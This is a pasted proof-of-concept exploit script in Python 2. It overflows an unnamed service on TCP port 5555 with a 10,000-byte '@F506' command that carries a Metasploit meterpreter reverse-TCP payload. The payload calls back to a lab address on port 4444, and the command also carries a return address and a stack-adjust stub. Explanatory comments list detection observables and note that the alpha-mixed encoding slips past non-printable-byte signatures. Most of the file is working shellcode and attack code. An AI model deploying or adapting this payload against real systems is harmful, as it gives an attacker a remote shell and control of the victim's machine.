
Untitled

a guest
Feb 10th, 2013
# Proof-of-concept overflow script (Python 2: note the `print` statements
# below) that connects to a hard-coded lab host on TCP/5555 and sends one
# oversized command containing a Metasploit-generated payload, a return
# address and a small machine-code stub. The application protocol behind
# '@F506' is not named anywhere on the page.
#
# Observables for defenders, all taken from this file:
#   * inbound: a single ~10 KB argument to an '@F506' command on TCP/5555,
#     followed by the literal 'pwnag3';
#   * outbound (if the payload runs): a reverse TCP connection to
#     192.168.182.149:4444 as given in the msfpayload command line below.
import socket
#msfpayload windows/meterpreter/reverse_tcp LPORT=4444 LHOST=192.168.182.149 R |msfencode -e x86/alpha_mixed -b "\x40" -t ruby
#x86/alpha_mixed succeeded with size 641 (iteration=1)
#554 bytes exactly = chunk1
# Encoded payload exactly as emitted by the msfencode command above (641
# bytes per the tool output). Adjacent string literals are implicitly
# concatenated into one str; under Python 2 that is a byte string, under
# Python 3 it would be text and the socket.send() call at the bottom would
# raise TypeError.
# Detection note: apart from the first few decoder-stub bytes
# (\x89\xe0\xd9\xc5\xd9\x70\xf4) the whole payload lies in the printable
# ASCII range - that is what the alpha_mixed encoder is for - so signatures
# that look for runs of non-printable shellcode bytes will not match it.
shell = ("\x89\xe0\xd9\xc5\xd9\x70\xf4\x59\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a"
"\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41"
"\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42"
"\x75\x4a\x49\x69\x6c\x6b\x58\x6d\x59\x45\x50\x73\x30\x33"
"\x30\x53\x50\x6c\x49\x49\x75\x35\x61\x78\x52\x72\x44\x4c"
"\x4b\x36\x32\x50\x30\x6c\x4b\x32\x72\x76\x6c\x6c\x4b\x43"
"\x62\x75\x44\x6c\x4b\x73\x42\x34\x68\x64\x4f\x4f\x47\x50"
"\x4a\x45\x76\x75\x61\x39\x6f\x64\x71\x59\x50\x4c\x6c\x55"
"\x6c\x31\x71\x43\x4c\x73\x32\x76\x4c\x57\x50\x6a\x61\x38"
"\x4f\x44\x4d\x56\x61\x79\x57\x4a\x42\x38\x70\x62\x72\x70"
"\x57\x6e\x6b\x73\x62\x54\x50\x4e\x6b\x33\x72\x37\x4c\x76"
"\x61\x6e\x30\x6e\x6b\x63\x70\x51\x68\x6b\x35\x39\x50\x54"
"\x34\x42\x6a\x76\x61\x4e\x30\x36\x30\x6c\x4b\x51\x58\x77"
"\x68\x6c\x4b\x71\x48\x65\x70\x57\x71\x6b\x63\x59\x73\x57"
"\x4c\x73\x79\x4c\x4b\x35\x64\x4c\x4b\x33\x31\x78\x56\x70"
"\x31\x39\x6f\x74\x71\x79\x50\x6c\x6c\x59\x51\x4a\x6f\x56"
"\x6d\x66\x61\x6a\x67\x34\x78\x4d\x30\x72\x55\x4c\x34\x43"
"\x33\x61\x6d\x6b\x48\x75\x6b\x51\x6d\x75\x74\x43\x45\x38"
"\x62\x76\x38\x4c\x4b\x30\x58\x66\x44\x55\x51\x6a\x73\x30"
"\x66\x6c\x4b\x74\x4c\x50\x4b\x6e\x6b\x43\x68\x57\x6c\x37"
"\x71\x39\x43\x4e\x6b\x34\x44\x6e\x6b\x67\x71\x38\x50\x6e"
"\x69\x51\x54\x56\x44\x61\x34\x31\x4b\x61\x4b\x55\x31\x63"
"\x69\x30\x5a\x32\x71\x69\x6f\x69\x70\x31\x48\x31\x4f\x52"
"\x7a\x6c\x4b\x62\x32\x7a\x4b\x6b\x36\x63\x6d\x61\x78\x66"
"\x53\x44\x72\x35\x50\x57\x70\x71\x78\x62\x57\x30\x73\x66"
"\x52\x43\x6f\x71\x44\x50\x68\x50\x4c\x73\x47\x77\x56\x65"
"\x57\x79\x6f\x69\x45\x4d\x68\x7a\x30\x53\x31\x65\x50\x63"
"\x30\x74\x69\x6f\x34\x62\x74\x66\x30\x35\x38\x71\x39\x6d"
"\x50\x70\x6b\x65\x50\x49\x6f\x4a\x75\x62\x70\x62\x70\x46"
"\x30\x72\x70\x51\x50\x56\x30\x31\x50\x36\x30\x65\x38\x6a"
"\x4a\x36\x6f\x6b\x6f\x69\x70\x6b\x4f\x4b\x65\x4e\x77\x33"
"\x5a\x56\x65\x75\x38\x49\x50\x6f\x58\x68\x36\x6e\x75\x52"
"\x48\x77\x72\x73\x30\x56\x71\x51\x4c\x4d\x59\x48\x66\x63"
"\x5a\x46\x70\x61\x46\x51\x47\x71\x78\x4c\x59\x49\x35\x73"
"\x44\x35\x31\x4b\x4f\x6a\x75\x4d\x55\x4b\x70\x30\x74\x76"
"\x6c\x59\x6f\x72\x6e\x76\x68\x72\x55\x7a\x4c\x61\x78\x78"
"\x70\x68\x35\x4c\x62\x52\x76\x4b\x4f\x4b\x65\x52\x4a\x53"
"\x30\x51\x7a\x33\x34\x76\x36\x51\x47\x50\x68\x56\x62\x79"
"\x49\x4b\x78\x63\x6f\x49\x6f\x6a\x75\x4e\x6b\x66\x56\x32"
"\x4a\x73\x70\x32\x48\x33\x30\x44\x50\x55\x50\x55\x50\x51"
"\x46\x50\x6a\x75\x50\x61\x78\x72\x78\x39\x34\x63\x63\x6d"
"\x35\x39\x6f\x49\x45\x4f\x63\x50\x53\x63\x5a\x37\x70\x46"
"\x36\x33\x63\x50\x57\x53\x58\x33\x32\x49\x49\x78\x48\x31"
"\x4f\x49\x6f\x4e\x35\x66\x61\x68\x43\x56\x49\x4f\x36\x4f"
"\x75\x6c\x36\x63\x45\x4a\x4c\x58\x43\x41\x41")

# The payload is split at byte 554 and the two halves are sent in reverse
# order (chunk2 first, chunk1 after the return address - see `buff`). The
# split point is asserted only by the "554 bytes exactly" comment above; the
# script does not re-derive or check it.
shell_chunk1 = shell[:554]   # first 554 bytes
shell_chunk2 = shell[554:]   # remainder (87 bytes if the 641-byte size comment holds)
#0x775e3422
# The four bytes that follow are 0x775e3422 in little-endian order. Judging by
# the name and its position in `buff`, this is the value meant to land on the
# saved return address; the page gives no source for the address (which
# module it lives in, or which build), so it cannot be validated from here.
eip = "\x22\x34\x5e\x77"
# Six bytes of x86 machine code placed immediately after `eip`. 81 C4 imm32
# appears to decode as `add esp, imm32` with imm32 = 0xFFFFFA24 (negative),
# i.e. a stack-pointer adjustment, which matches the variable name - confirm
# by disassembly rather than relying on this reading.
adjust = "\x81\xc4\x24\xfa\xff\xff"
# Padding so that shell_chunk2 + fill is exactly 1024 bytes.
fill = "A" * (1024 - len(shell_chunk2))
# Trailing padding so that the whole buffer is exactly 10000 bytes.
junk = "D" * (10000 - len(shell_chunk2) - len(fill) - len(eip) - len(adjust) - len(shell_chunk1))
# On-wire layout of the 10000-byte argument:
#   [chunk2][A...to 1024][eip][adjust][chunk1][D...to 10000]
buff = shell_chunk2 + fill + eip + adjust + shell_chunk1 + junk

# Python 2 print statements (a SyntaxError under Python 3).
print "chunk 1 is " + str(len(shell_chunk1))
print "\nchunk 2 is " + str(len(shell_chunk2))
# Plain TCP to a hard-coded RFC 1918 lab address. socket.connect() returns
# None, so the `connect` name is never meaningful.
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.182.128',5555))
# Single fire-and-forget write: framing is '@F506 ' + the 10000-byte buffer +
# '@' + CRLF + 'pwnag3' + CRLF CRLF. The return value of send() is ignored,
# nothing is read back, and no error handling is performed, so the script
# gives no indication of whether the service accepted the data.
s.send('@F506 '+buff+'@\r\npwnag3\r\n\r\n')
s.close()